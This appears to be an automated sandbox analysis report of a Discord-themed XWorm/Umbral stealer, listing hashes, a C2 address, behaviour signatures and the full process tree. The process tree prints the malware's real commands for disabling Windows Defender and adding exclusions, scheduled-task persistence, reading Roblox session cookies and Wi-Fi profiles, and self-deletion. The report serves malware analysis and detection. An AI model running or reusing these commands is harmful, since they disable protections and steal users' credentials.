Resubmissions
13-07-2024 23:41
240713-3pr3vstcrb 10Analysis
-
max time kernel
84s -
max time network
87s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
13-07-2024 23:41
Behavioral task
behavioral1
Sample
Discord Tool v.7.7.exe
Resource
win10v2004-20240709-en
General
-
Target
Discord Tool v.7.7.exe
-
Size
65KB
-
MD5
5ff4a7e0fefe94b3bbf86f2137577ff2
-
SHA1
67d9e82ef85881813228e902fd7880e0ceba20b9
-
SHA256
a562d44e4bf6ec4f8a15c420bc3343f56011b2b454862869e01471075cba1a7e
-
SHA512
05edf0d3bc2da186f6a159ef6e5c6f0456fc0979e188c8e8cb62799e0c663515dd9d4aaf631ac8f7830934a618e6eca5fd94e0e1d39d14ee9fbf68e97e8319a4
-
SSDEEP
768:kRwwGkRrFpObTMFIiVZTKb9hFrTbpkLZ9WBf6Owg5+OWhXBZ5/HA:kRxGW5kbTqgTbpm9g6jk+OWRxHA
Malware Config
Extracted
xworm
original-preston.gl.at.ply.gg:51307
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000234dd-63.dat family_umbral behavioral1/memory/536-70-0x0000016AB3540000-0x0000016AB3586000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/4720-1-0x0000000000E80000-0x0000000000E96000-memory.dmp family_xworm behavioral1/files/0x000700000001e7c5-243.dat family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1516 powershell.exe 1152 powershell.exe 1224 powershell.exe 2824 powershell.exe 3064 powershell.exe 4988 powershell.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts mwjbna.exe File opened for modification C:\Windows\System32\drivers\etc\hosts ypjjxu.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation Discord Tool v.7.7.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Discord Tool v.7.7.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Discord Tool v.7.7.exe -
Executes dropped EXE 3 IoCs
pid Process 536 mwjbna.exe 4576 ypjjxu.exe 2820 XClient.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 52 discord.com 43 discord.com 44 discord.com 51 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com 48 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4772 wmic.exe 4856 wmic.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 452 PING.EXE 4140 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4436 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 1152 powershell.exe 1152 powershell.exe 1224 powershell.exe 1224 powershell.exe 2824 powershell.exe 2824 powershell.exe 3064 powershell.exe 3064 powershell.exe 4720 Discord Tool v.7.7.exe 536 mwjbna.exe 4988 powershell.exe 4988 powershell.exe 5008 powershell.exe 5008 powershell.exe 4380 powershell.exe 4380 powershell.exe 3512 powershell.exe 3512 powershell.exe 4736 powershell.exe 4736 powershell.exe 4576 ypjjxu.exe 1516 powershell.exe 1516 powershell.exe 3104 powershell.exe 3104 powershell.exe 3788 powershell.exe 3788 powershell.exe 5072 powershell.exe 5072 powershell.exe 1652 powershell.exe 1652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4720 Discord Tool v.7.7.exe Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 4720 Discord Tool v.7.7.exe Token: SeDebugPrivilege 536 mwjbna.exe Token: SeIncreaseQuotaPrivilege 2276 wmic.exe Token: SeSecurityPrivilege 2276 wmic.exe Token: SeTakeOwnershipPrivilege 2276 wmic.exe Token: SeLoadDriverPrivilege 2276 wmic.exe Token: SeSystemProfilePrivilege 2276 wmic.exe Token: SeSystemtimePrivilege 2276 wmic.exe Token: SeProfSingleProcessPrivilege 2276 wmic.exe Token: SeIncBasePriorityPrivilege 2276 wmic.exe Token: SeCreatePagefilePrivilege 2276 wmic.exe Token: SeBackupPrivilege 2276 wmic.exe Token: SeRestorePrivilege 2276 wmic.exe Token: SeShutdownPrivilege 2276 wmic.exe Token: SeDebugPrivilege 2276 wmic.exe Token: SeSystemEnvironmentPrivilege 2276 wmic.exe Token: SeRemoteShutdownPrivilege 2276 wmic.exe Token: SeUndockPrivilege 2276 wmic.exe Token: SeManageVolumePrivilege 2276 wmic.exe Token: 33 2276 wmic.exe Token: 34 2276 wmic.exe Token: 35 2276 wmic.exe Token: 36 2276 wmic.exe Token: SeIncreaseQuotaPrivilege 2276 wmic.exe Token: SeSecurityPrivilege 2276 wmic.exe Token: SeTakeOwnershipPrivilege 2276 wmic.exe Token: SeLoadDriverPrivilege 2276 wmic.exe Token: SeSystemProfilePrivilege 2276 wmic.exe Token: SeSystemtimePrivilege 2276 wmic.exe Token: SeProfSingleProcessPrivilege 2276 wmic.exe Token: SeIncBasePriorityPrivilege 2276 wmic.exe Token: SeCreatePagefilePrivilege 2276 wmic.exe Token: SeBackupPrivilege 2276 wmic.exe Token: SeRestorePrivilege 2276 wmic.exe Token: SeShutdownPrivilege 2276 wmic.exe Token: SeDebugPrivilege 2276 wmic.exe Token: SeSystemEnvironmentPrivilege 2276 wmic.exe Token: SeRemoteShutdownPrivilege 2276 wmic.exe Token: SeUndockPrivilege 2276 wmic.exe Token: SeManageVolumePrivilege 2276 wmic.exe Token: 33 2276 wmic.exe Token: 34 2276 wmic.exe Token: 35 2276 wmic.exe Token: 36 2276 wmic.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeIncreaseQuotaPrivilege 3920 wmic.exe Token: SeSecurityPrivilege 3920 wmic.exe Token: SeTakeOwnershipPrivilege 3920 wmic.exe Token: SeLoadDriverPrivilege 3920 wmic.exe Token: SeSystemProfilePrivilege 3920 wmic.exe Token: SeSystemtimePrivilege 3920 wmic.exe Token: SeProfSingleProcessPrivilege 3920 wmic.exe Token: SeIncBasePriorityPrivilege 3920 wmic.exe Token: SeCreatePagefilePrivilege 3920 wmic.exe Token: SeBackupPrivilege 3920 wmic.exe Token: SeRestorePrivilege 3920 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4720 Discord Tool v.7.7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4720 wrote to memory of 1152 4720 Discord Tool v.7.7.exe 88 PID 4720 wrote to memory of 1152 4720 Discord Tool v.7.7.exe 88 PID 4720 wrote to memory of 1224 4720 Discord Tool v.7.7.exe 90 PID 4720 wrote to memory of 1224 4720 Discord Tool v.7.7.exe 90 PID 4720 wrote to memory of 2824 4720 Discord Tool v.7.7.exe 92 PID 4720 wrote to memory of 2824 4720 Discord Tool v.7.7.exe 92 PID 4720 wrote to memory of 3064 4720 Discord Tool v.7.7.exe 94 PID 4720 wrote to memory of 3064 4720 Discord Tool v.7.7.exe 94 PID 4720 wrote to memory of 4436 4720 Discord Tool v.7.7.exe 96 PID 4720 wrote to memory of 4436 4720 Discord Tool v.7.7.exe 96 PID 4720 wrote to memory of 536 4720 Discord Tool v.7.7.exe 100 PID 4720 wrote to memory of 536 4720 Discord Tool v.7.7.exe 100 PID 536 wrote to memory of 2276 536 mwjbna.exe 101 PID 536 wrote to memory of 2276 536 mwjbna.exe 101 PID 536 wrote to memory of 4252 536 mwjbna.exe 103 PID 536 wrote to memory of 4252 536 mwjbna.exe 103 PID 536 wrote to memory of 4988 536 mwjbna.exe 105 PID 536 wrote to memory of 4988 536 mwjbna.exe 105 PID 536 wrote to memory of 5008 536 mwjbna.exe 107 PID 536 wrote to memory of 5008 536 mwjbna.exe 107 PID 536 wrote to memory of 4380 536 mwjbna.exe 109 PID 536 wrote to memory of 4380 536 mwjbna.exe 109 PID 536 wrote to memory of 3512 536 mwjbna.exe 111 PID 536 wrote to memory of 3512 536 mwjbna.exe 111 PID 536 wrote to memory of 3920 536 mwjbna.exe 113 PID 536 wrote to memory of 3920 536 mwjbna.exe 113 PID 536 wrote to memory of 2432 536 mwjbna.exe 115 PID 536 wrote to memory of 2432 536 mwjbna.exe 115 PID 536 wrote to memory of 1224 536 mwjbna.exe 117 PID 536 wrote to memory of 1224 536 mwjbna.exe 117 PID 536 wrote to memory of 4736 536 mwjbna.exe 119 PID 536 wrote to memory of 4736 536 mwjbna.exe 119 PID 536 wrote to memory of 4772 536 mwjbna.exe 121 PID 536 wrote to memory of 4772 536 mwjbna.exe 121 PID 536 wrote to memory of 736 536 mwjbna.exe 123 PID 536 wrote to memory of 736 536 mwjbna.exe 123 PID 4720 wrote to memory of 4576 4720 Discord Tool v.7.7.exe 125 PID 4720 wrote to memory of 4576 4720 Discord Tool v.7.7.exe 125 PID 736 wrote to memory of 452 736 cmd.exe 126 PID 736 wrote to memory of 452 736 cmd.exe 126 PID 4576 wrote to memory of 1888 4576 ypjjxu.exe 127 PID 4576 wrote to memory of 1888 4576 ypjjxu.exe 127 PID 4576 wrote to memory of 2132 4576 ypjjxu.exe 129 PID 4576 wrote to memory of 2132 4576 ypjjxu.exe 129 PID 4576 wrote to memory of 1516 4576 ypjjxu.exe 131 PID 4576 wrote to memory of 1516 4576 ypjjxu.exe 131 PID 4576 wrote to memory of 3104 4576 ypjjxu.exe 133 PID 4576 wrote to memory of 3104 4576 ypjjxu.exe 133 PID 4576 wrote to memory of 3788 4576 ypjjxu.exe 135 PID 4576 wrote to memory of 3788 4576 ypjjxu.exe 135 PID 4576 wrote to memory of 5072 4576 ypjjxu.exe 137 PID 4576 wrote to memory of 5072 4576 ypjjxu.exe 137 PID 4576 wrote to memory of 2064 4576 ypjjxu.exe 139 PID 4576 wrote to memory of 2064 4576 ypjjxu.exe 139 PID 4576 wrote to memory of 4168 4576 ypjjxu.exe 141 PID 4576 wrote to memory of 4168 4576 ypjjxu.exe 141 PID 4576 wrote to memory of 2920 4576 ypjjxu.exe 143 PID 4576 wrote to memory of 2920 4576 ypjjxu.exe 143 PID 4576 wrote to memory of 1652 4576 ypjjxu.exe 145 PID 4576 wrote to memory of 1652 4576 ypjjxu.exe 145 PID 4576 wrote to memory of 4856 4576 ypjjxu.exe 147 PID 4576 wrote to memory of 4856 4576 ypjjxu.exe 147 PID 4576 wrote to memory of 1368 4576 ypjjxu.exe 149 PID 4576 wrote to memory of 1368 4576 ypjjxu.exe 149 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4252 attrib.exe 2132 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe"C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Discord Tool v.7.7.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord Tool v.7.7.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe"3⤵
- Views/modifies file attributes
PID:4252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mwjbna.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2432
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4736
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4772
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\mwjbna.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe"C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1888
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe"3⤵
- Views/modifies file attributes
PID:2132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5072
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:2064
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:4168
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1652
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4856
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ypjjxu.exe" && pause3⤵PID:1368
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4140
-
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd"2⤵PID:4136
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3832
-
-
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
PID:2820
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5750e4be22a6fdadd7778a388198a9ee3
SHA18feb2054d8a3767833dd972535df54f0c3ab6648
SHA25626209c196c9c45202d27468ea707b2b46f375bb612d50271924a28f9210df6a1
SHA512b0415087dfc32908b449b876b395a607698b0f7b72031916b6fe7c002e4b163ba318b7e85c8ce41f007429e666974c04967bc14345e3f4614e34d94f5c8ae804
-
Filesize
948B
MD5ba42012e626d8c04b25c5e8bcb49d58e
SHA14f542888067e87d2d4dd8ced7bc901abd60f819b
SHA2560a3c73d3b3afc81747d415241a047a1cadd117a0536606b89e57ecf8836e40ff
SHA5126678e24f430379c3c2ec0385fc02d0db9a65720072b57e4b36f23be65c82b4d3da2692e1bf0d575bdd59d5673fa1b64ab99d1881367af632bb89121b1981fe11
-
Filesize
1KB
MD56345996dd8d19b416cbb0644e896864a
SHA170b553a603fdee1e2300b4b9855a6d691da6d201
SHA25684c7485a1486ac110f581d143f84708c8b6bf5cffaf04d4c870001e107ce007a
SHA5122b349aed2b54ca9d212036a8a97b16d5b5bae4e42daf9a4b142685382d44af438bc72e725c586318854096dd744372240dd24e526580b432afc055b3b74c1cd0
-
Filesize
1KB
MD545ad40f012b09e141955482368549640
SHA13f9cd15875c1e397c3b2b5592805577ae88a96cb
SHA256ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce
SHA5123de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33
-
Filesize
64B
MD5b68ab4ca7e39baffff644d4820c98f0c
SHA125aee3c71f29c4520c9a89a13ce47864b75ced4e
SHA256974a01642047984dcc7429b685decc35b22bfb88926f25174f77721f4afaf676
SHA5125c96c46ba870ced22f9956ecec737fe2a6d4d73a52a1db323b29a82324f3fbd298ecb0a79ce55828bcb9e813b64815bae137d480f26e9d69f6cf7830dfd4ab9d
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
948B
MD5c65738617888921a153bd9b1ef516ee7
SHA15245e71ea3c181d76320c857b639272ac9e079b1
SHA2564640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA5122e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa
-
Filesize
1KB
MD5227556da5e65f6819f477756808c17e4
SHA16ffce766e881ca2a60180bb25f4981b183f78279
SHA256101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
Filesize
944B
MD5b8b57459858c5ea0c76b88922d7a0b37
SHA19a102b358e31fc79315e24603947558c119afad3
SHA2562d005bc789565b275d0587ba2ecc42b2eadd81d80aa77aff4e3432a2e3e70dc6
SHA512ffc443124f35a267f7ed85d0444040da0cadcbb3ceb1293f3186f34bda75bbd778e6dc9806903aed46b053178108714dcc4dec4cce3229bb7d5808b37fb6cc54
-
Filesize
944B
MD5ef72c47dbfaae0b9b0d09f22ad4afe20
SHA15357f66ba69b89440b99d4273b74221670129338
SHA256692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA5127514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4
-
Filesize
944B
MD598baf5117c4fcec1692067d200c58ab3
SHA15b33a57b72141e7508b615e17fb621612cb8e390
SHA25630bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d
-
Filesize
944B
MD59948df3a61230068601b6cf5f5ae6195
SHA1b6cd3118ae6ae8a0c7c2707700616a32619888a1
SHA2568eb4591930c695e7e8dc6e938d14419ef957b54241bb376635a999ac744b9db8
SHA512af80d545ed24cece281b033961905ad139a1cc0e8082ca5a114c58e0cad18bed5a4f881400436d6b5eafcff3d9e37d4c16bcc41771ab9f20613a7805bedf8f4c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
254KB
MD5b840d3fa729c3e32debff348311c5e74
SHA1a3c857ebffc0e31d4983dc488849088a5515f1f4
SHA256bf06c2b8760d163e7de3c4443101c7598056fc0ab552ac1638cca5466dfd3a8c
SHA5126e6592a39ed14d29dd1c5562e919cb01b8683e3bcc80053c9157417b00140fbfe488dd1676d673ccc8d09491e5ff55ee1357a3dce2cfee8bab94e909d1217d74
-
Filesize
65KB
MD55ff4a7e0fefe94b3bbf86f2137577ff2
SHA167d9e82ef85881813228e902fd7880e0ceba20b9
SHA256a562d44e4bf6ec4f8a15c420bc3343f56011b2b454862869e01471075cba1a7e
SHA51205edf0d3bc2da186f6a159ef6e5c6f0456fc0979e188c8e8cb62799e0c663515dd9d4aaf631ac8f7830934a618e6eca5fd94e0e1d39d14ee9fbf68e97e8319a4
-
Filesize
2KB
MD54028457913f9d08b06137643fe3e01bc
SHA1a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b